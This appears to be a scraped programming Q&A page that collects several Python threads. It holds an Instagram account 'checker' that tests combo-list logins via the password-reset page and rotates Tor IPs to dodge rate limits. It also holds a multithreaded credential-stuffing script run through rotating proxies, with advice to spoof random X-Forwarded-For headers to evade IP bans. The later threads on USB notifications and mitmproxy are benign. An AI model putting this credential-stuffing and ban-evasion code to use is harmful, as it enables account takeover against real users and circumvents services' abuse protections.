I decided to create a checker for Instagram accounts.
Please tell me how you can change the ip when you restart the browser. I have a Tor profile. That is, the ip automatically changes every 10 minutes. How can I make the ip change 1 time per minute. Is this even possible?
Maybe there is some kind of set_preference setting or how in general you can change the ip when restarting the Firefox browser with the Tor settings.
import time
from selenium import webdriver
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
file = open('Good2.txt', encoding='utf-8-sig').read().split('\n')
goods = open('good_acc.txt', 'a+')
def settings_browser():
""" Настройки браузера FireFox. """
profile = FirefoxProfile(r'C:\Users\ASUS\Desktop\Scrape\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default')
profile.set_preference('network.proxy.type', 1)
profile.set_preference('network.proxy.socks', '127.0.0.1')
profile.set_preference('network.proxy.socks_port', 9050)
profile.set_preference("network.proxy.socks_remote_dns", False)
# get a huge speed increase by not downloading images
profile.set_preference("permissions.default.image", 2)
profile.update_preferences()
return profile
def check_email():
""" Принимает всплывающее окно куки. Чекает валидность почт, если почта валидна, то сохраняет в файл 'good_acc.txt'. """
driver = webdriver.Firefox(firefox_profile=settings_browser(), executable_path=r'C:\Users\ASUS\Desktop\Scrape\geckodriver.exe')
for login in file:
driver.get("https://www.instagram.com/accounts/password/reset/")
body = driver.find_elements_by_class_name('pbNvD.FrS-d.gD9tr')
for bd in body:
if bd.find_element_by_class_name('aOOlW.bIiDR').text == 'Принять все':
bd.find_element_by_class_name('aOOlW.bIiDR').click()
time.sleep(7)
authorization = driver.find_elements_by_class_name("AHCwU")
pops = driver.find_elements_by_class_name("_-rjm")
username = login.split(":")[0]
password = login.split(":")[1]
for data in authorization:
# почта логин
data_login = data.find_element_by_name('cppEmailOrUsername')
data_login.click()
data_login.send_keys(username)
time.sleep(1)
# кнопка входа
clock_button = data.find_element_by_class_name('sqdOP.L3NKy.y3zKF')
clock_button.click()
time.sleep(2)
for pop in pops:
if 'Мы отправили ссылку для восстановления' in pop.find_element_by_class_name('tA2fc').text:
# Почта зарегана
goods.write(username + ' : ' + password + '\n')
print('Валидный аккаунт ' + username + ' : ' + password)
elif 'Подождите несколько минут, прежде чем пытаться снова.' in pop.find_element_by_class_name('tA2fc').text:
driver.quit()
driver = webdriver.Firefox(firefox_profile=settings_browser(), executable_path=r'C:\Users\ASUS\Desktop\Scrape\geckodriver.exe')
print('Успешная перезагрузка драйвера из-за "Подождите несколько минут, прежде чем пытаться снова."')
elif 'feedback_required' in pop.find_element_by_class_name('tA2fc').text:
driver.quit()
driver = webdriver.Firefox(firefox_profile=settings_browser(), executable_path=r'C:\Users\ASUS\Desktop\Scrape\geckodriver.exe')
print('Успешная перезагрузка драйвера из-за "feedback_required"')
else:
# Почта не зарегана
print(f"Не валидный аккаунт " + username)
goods.close()
def main():
check_email()
if __name__ == '__main__':
main()
If you set ControlPort: 9051 (and Passord: ...) in config file (on Linux /etc/tor/torrc) then you can use even standard socket to send signal to tor to change IP.
import socket
s = socket.socket()
s.connect(('127.0.0.1', 9051))
s.send('AUTHENTICATE "your_passord"\r\nSIGNAL NEWNYM\r\n'.encode())
It needs few seconds to get new IP from tor network.
And after few seconds proxy should use new IP.
You may also use module stem for this (it also needs settings in torrc)
from stem import Signal
from stem.control import Controller
with Controller.from_port(port=9051) as controller:
controller.authenticate(password='your_password')
controller.signal(Signal.NEWNYM)
More: Python: How to use Tor Network with requests to change IP?
EDIT:
import socket
def main():
# send signal to `tor` to change IP
s = socket.socket()
s.connect(('127.0.0.1', 9051))
s.send('AUTHENTICATE "your_passord"\r\nSIGNAL NEWNYM\r\n'.encode())
# wait few seconds for new IP
time.sleep(3)
check_email()
Related
I'm using multiprocessing to test proxy server usability. The target function of my process takes a proxy server address and a queue as arguments and opens an instance of webdriver with the given proxy. The function tests the proxy by going to a specific url and trying to retrieve an html element. If the test is successful the function will add the webdriver instance to the queue. The function is shown below.
def test_proxy(address, queue):
print(f"testing proxy {address}")
chrome_options_1 = webdriver.ChromeOptions()
chrome_options_1.add_argument('--proxy-server=%s' % address)
chrome_options_1.add_argument("headless")
driver = webdriver.Chrome('.\driver\chromedriver.exe', options=chrome_options_1)
driver.set_page_load_timeout(10)
url = "https://www.facebook.com/marketplace/nyc/search/?query=honda"
try:
driver.get(url)
driver.find_element_by_xpath("//*[#class='kbiprv82']/a").get_attribute("href")
print(f"Successfully connected to proxy server at {address}")
queue.put(driver)
return
except:
print("Connection failed")
driver.quit()
In my main process I have a list of proxy addresses to test. A process is created to test each proxy in the list until a test is successful and a driver instance is put in the queue. If an item is found in the queue all the processes are terminated and the proxy list is cleared. The loop in my main process limits the number of child processes to 10. The main process code is in a class and shown below.
def find_proxy(self):
self.proxies = []
self.proxy_queue = multiprocessing.Queue()
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("headless")
driver = webdriver.Chrome('.\driver\chromedriver.exe', options=chrome_options)
driver.get("https://free-proxy-list.net/")
Select(driver.find_element_by_xpath("//*[#id='proxylisttable']/tfoot/tr/th[7]/select")).select_by_visible_text("yes")
for country in ["US", "MX", "CA", "CL", "CO", "BR", "PE"]:
try:
Select(driver.find_element_by_xpath("//*[#id='proxylisttable']/tfoot/tr/th[3]/select")).select_by_visible_text(country)
i = 0
entries = driver.find_elements_by_xpath("//table[#id='proxylisttable']/tbody/tr/td")
for entry in entries:
if i == 7:
i = 0
self.proxies.append([proxy_address])
else:
if i == 0:
proxy_address = entry.text + ':'
if i == 1:
proxy_address = proxy_address + entry.text
i = i + 1
except:
pass
driver.quit()
while len(self.proxies) > 0:
i = 0
for proxy in self.proxies[:10]:
if self.proxy_queue.empty() == False:
driver = self.proxy_queue.get()
for proxy_1 in self.proxies:
try:
proxy_1[1].terminate()
except:
pass
self.proxies.clear()
return driver
elif len(proxy) < 2:
proxy.insert(1, multiprocessing.Process(target=test_proxy, args=(proxy[0], self.proxy_queue,)))
print(f"proxy thread {proxy[0]} created")
proxy[1].start()
print(f"proxy thread {proxy[0]} started")
elif proxy[1].is_alive() == False:
print(f"proxy thread {proxy[0]} dead")
del self.proxies[i]
print("proxy deleted")
break
i = i + 1
The issue is that the processes seem to start just fine but none of the code in the test_proxy function is actually run, not even the first print statement.
I'm writing a script to access a website using proxies with multiple threads but now I'm stuck in multiple threads, when I run the script below, it opens 5 browsers but all 5 use 1 proxy, I want 5 browsers to use different proxies, can someone help me complete it? thank you
Here is my script :
from selenium import webdriver
from selenium import webdriver
import time , random
import threading
def e():
a = open("sock2.txt", "r")
for line in a.readlines():
b = line
prox = b.split(":")
IP = prox[0]
PORT = int(prox[1].strip("\n"))
print(IP)
print(PORT)
profile = webdriver.FirefoxProfile()
profile.set_preference("network.proxy.type", 1)
profile.set_preference("network.proxy.socks", IP)
profile.set_preference("network.proxy.socks_port", PORT)
try:
driver = webdriver.Firefox(firefox_profile=profile)
driver.get("http://www.whatsmyip.org/")
except:
print("Proxy Connection Error")
driver.quit()
else:
time.sleep(random.randint(40, 70))
driver.quit()
for i in range(5):
t = threading.Thread(target=e)
t.start()
(Wish everyone has a happy and lucky new year)
Dominik Lašo captured it correctly - each threads processes the file from the beginning. Here's probably how it should look like:
from selenium import webdriver
from selenium import webdriver
import time , random
import threading
def e(ip, port):
profile = webdriver.FirefoxProfile()
profile.set_preference("network.proxy.type", 1)
profile.set_preference("network.proxy.socks", IP)
profile.set_preference("network.proxy.socks_port", PORT)
try:
driver = webdriver.Firefox(firefox_profile=profile)
driver.get("http://www.whatsmyip.org/")
except:
print("Proxy Connection Error")
driver.quit()
else:
time.sleep(random.randint(40, 70))
driver.quit()
my_threads = []
with open("sock2.txt", "r") as fd:
for line in fd.readlines():
line = line.strip()
if not line:
continue
prox = line.split(":")
ip = prox[0]
port = int(prox[1])
print('-> {}:{}'.format(ip, port))
t = threading.Thread(target=e, args=(ip, port,))
t.start()
my_threads.append(t)
for t in my_threads:
t.join()
( I personaly think that a problem is there that when you start a program, it will go to new thread, which will go throught the textfile from beginning, becasue you aint deleting them )
I have cane across the same problem, when I was doing the same thing as you do now. I know you would rather want help with your code, but I am in hurry to test it and want to help you ;) , so here is a code that works for me ... There is even task killer for a chrome ( you just have to edit it to firefox )
If I were you, I would start the thread after opening the file, cuz it looks liek you are opening the same file from 1st line everytime the tread starts
links = [ // Link you want to go to ]
def funk(xxx , website):
link = website
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--proxy-server=%s' % str(xxx))
chromedriver = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'chromedriver')
chrome = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
try :
// Do stuff
except:
print('exception')
chrome.close()
for link in links:
f = open('proxies.txt')
line = f.readline()
x = 1
xx = 0
while line:
if number_of_used_proxies < 10:
print(line)
line = f.readline()
try:
threading.Timer(40, funk, [line, link]).start()
except Exception as e:
print(e)
time.sleep(1)
x += 1
number_of_used_proxies += 1
else:
time.sleep(100)
for x in range(1, 10):
try:
xzxzx = 'os.system("taskkill /f /im chrome.exe")'
os.system("killall 'Google Chrome'")
except:
print("NoMore")
time.sleep(10)
number_of_used_proxies = 0
f.close()
Hope it helps :)
vantuong: Here's how you can solve the problem with ThreadPoolExecutor.
Reference: https://docs.python.org/3/library/concurrent.futures.html
from selenium import webdriver
import time, random
#import threading
import concurrent.futures
MAX_WORKERS = 5
def get_proxys(data_file):
proxys = []
with open(data_file, "r") as fd:
for line in fd.readlines():
line = line.strip()
if not line:
continue
prox = line.split(":")
ip = prox[0]
port = int(prox[1])
proxys.append((ip, port))
return proxys
def e(ip, port):
profile = webdriver.FirefoxProfile()
profile.set_preference("network.proxy.type", 1)
profile.set_preference("network.proxy.socks", IP)
profile.set_preference("network.proxy.socks_port", PORT)
try:
driver = webdriver.Firefox(firefox_profile=profile)
driver.get("http://www.whatsmyip.org/")
except:
print("Proxy Connection Error")
driver.quit()
else:
time.sleep(random.randint(40, 70))
driver.quit()
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
proxys = get_proxys('sock2.txt')
tasks = {executor.submit(e, proxy[0], proxy[1]): proxy for proxy in proxys}
for task in concurrent.futures.as_completed(tasks):
proxy = tasks[task]
try:
data = task.result()
except Exception as exc:
print('{} generated an exception: {}'.format(proxy, exc))
else:
print('{} completed successfully'.format(proxy))
Fun exercise: Try playing around with different values of MAX_WORKERS.
As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
I have a python script that monitors USB ports (checks which devices are connected). The script performs some scraping and displays a desktop notification. I would like it to run automatically on every boot. This is the code:
#! /usr/bin/python
import glib
import re
import subprocess
import requests
import bs4
import datetime
import sys
import os
import time
from selenium import webdriver
from pyudev import Context, Monitor
from selenium.common.exceptions import NoSuchElementException
def demote():
def result():
os.setgid(100)
os.setuid(1000)
return result
def inotify(title, message):
subprocess.call(['notify-send', '{}\n'.format(title), '{0}\n'.format(message)], preexec_fn=demote())
#os.system('notify-send ' + title + ' ' + message)
def get_network_data(tout):
"""Scrapes balance data from ISP website."""
if tout is not None:
try:
# Do some scraping
if data_found:
full_msg = '{0}\n{1}'.format(my_balance.capitalize(), airtime_balance.capitalize())
inotify('My Balance', full_msg)
#subprocess.call(['notify-send', 'My Balance', '\n{0}\n{1}'.format(my_balance.capitalize(), airtime_balance.capitalize())], preexec_fn=demote())
else:
print('Could not retrieve data from page...')
full_msg = '{0}'.format('Error: Could not retrieve data from page.')
inotify('My Balance', full_msg)
#subprocess.call(['notify-send', 'My Balance', '\n{0}'.format('Error: Could not retrieve data from page.')], preexec_fn=demote())
except NoSuchElementException:
print('Could not locate element...')
full_msg = '{0}'.format('Error: Could not locate element - acc.')
inotify('My Balance', full_msg)
#subprocess.call(['notify-send', 'iMonitor:get_network_data', '\n{0}'.format('Error: Could not locate element - acc.')], preexec_fn=demote())
else:
print('Could not find USB device...')
full_msg = '\n{0}'.format('Error: Could not find USB device.')
inotify('My Balance', full_msg)
#subprocess.call(['notify-send', 'iMonitor', '\n{0}'.format('Error: Could not find USB device.')], preexec_fn=demote())
def identify_phone(observer, device):
"""Identifies if specific USB device (phone) is connected (tethered)."""
global last_updated, initial_search, msg_count
current_time = datetime.datetime.now()
time_diff = current_time - last_updated
if (time_diff.seconds > 300) or initial_search:
try:
time.sleep(0.25)
tout = subprocess.check_output("lsusb | grep 1234:5678", shell=True)
except subprocess.CalledProcessError:
tout = None
last_updated = datetime.datetime.now()
initial_search = False
get_network_data(tout)
if time_diff.seconds > 10:
msg_count = 1
if not initial_search and msg_count == 1:
wait_time = datetime.datetime.fromtimestamp(600 - time_diff.seconds)
message = wait_time.strftime('You may have to wait %-M minute(s), %-S second(s) before another check is done.')
print('Could not retrieve data from page...')
full_msg = '\n{0}'.format(message)
inotify('My Balance', full_msg)
#subprocess.call(['notify-send', 'iMonitor:Identify Phone', '\n{0}'.format(message)], preexec_fn=demote())
msg_count += 1
try:
initial_search = True
last_updated = datetime.datetime.now()
msg_count = 1
try:
from pyudev.glib import MonitorObserver
except ImportError:
from pyudev.glib import GUDevMonitorObserver as MonitorObserver
context = Context()
monitor = Monitor.from_netlink(context)
monitor.filter_by(subsystem='usb')
observer = MonitorObserver(monitor)
observer.connect('device-added', identify_phone)
monitor.start()
glib.MainLoop().run()
except KeyboardInterrupt:
print('\nShutdown requested.\nExiting gracefully...')
sys.exit(0)
However, the script runs as root and, having tried to change the uid and guid, I have not managed to get it to display desktop notifications to the logged in (normal) user. Any help would be appreciated.
PS:
OS - OpenSUSE 42.1
KDE version - KDE Plasma 5.5.5
I assume you need the script to run in KDE in which case you can simply copy or link the script into the ~/.kde/Autostart/ directory in KDE 4. In KDE 5 the directory has been moved to ~/.config/autostart.
I guess You can use cron job with #reboot modifier. It will run every time your system will boot up.
I'm using libmproxy to capture http traffic. I would like to use web driver to load a web page while the proxy is running. The proxy code is working great but I am unable to launch the page. I assume the script is becoming stuck in a loop at m.run(). How can I move to the web driver code while the proxy is running?
import unittest
import sys
from libmproxy import proxy, dump, cmdline
from libmproxy.version import VERSION
from optparse import OptionParser
from selenium import webdriver
class Test(unittest.TestCase):
def setUp(self):
parser = OptionParser(
usage = "%prog [options] [filter]",
version="%%prog %s"%VERSION,
)
cmdline.common_options(parser)
parser.add_option(
"--keepserving",
action="store_true", dest="keepserving", default=False,
help="Continue serving after client playback or file read. We exit by default."
)
options, args = parser.parse_args()
if options.quiet:
options.verbose = 0
proxyconfig = proxy.process_proxy_options(parser, options)
if options.no_server:
server = proxy.DummyServer(proxyconfig)
else:
try:
server = proxy.ProxyServer(proxyconfig, options.port, options.addr)
except proxy.ProxyServerError, v:
print >> sys.stderr, "mitmdump:", v.args[0]
sys.exit(1)
try:
dumpopts = dump.Options(**cmdline.get_common_options(options))
except cmdline.OptionException, v:
parser.error(v.message)
dumpopts.keepserving = options.keepserving
if args:
filt = " ".join(args)
else:
filt = None
try:
PROXY_HOST = "localhost"
PROXY_PORT = 8080
#driver.get("http://msn.com")
#f = open('/Users/cnave/Documents/capture/dump.txt', 'w')
#sys.stdout('/Users/cnave/Documents/capture/dump.txt', 'w')
#open('/Users/cnave/Documents/capture/dump.txt', 'w')
m = dump.DumpMaster(server, dumpopts, filt)
m.run()
#sys.stdout('/Users/cnave/Documents/capture/dump')
fp = webdriver.FirefoxProfile()
# Direct = 0, Manual = 1, PAC = 2, AUTODETECT = 4, SYSTEM = 5
fp.set_preference("network.proxy.type", 1)
fp.set_preference("network.proxy.http", PROXY_HOST)
fp.set_preference("network.proxy.http_port", PROXY_PORT)
fp.set_preference("network.proxy.no_proxies_on", "") # set this value as desired
driver = webdriver.Firefox(firefox_profile=fp)
driver.get('http://google.com')
except dump.DumpError, e:
print >> sys.stderr, "mitmdump:", e
sys.exit(1)
except KeyboardInterrupt:
pass
self.dm = dump.DumpMaster(server, dumpopts, filt)
// run the MITM proxy in a background thread
thread.start_new_thread(self.dm.run,())
// and you maybe need to shutdown the proxy in tearDown()
self.dm.shutdown()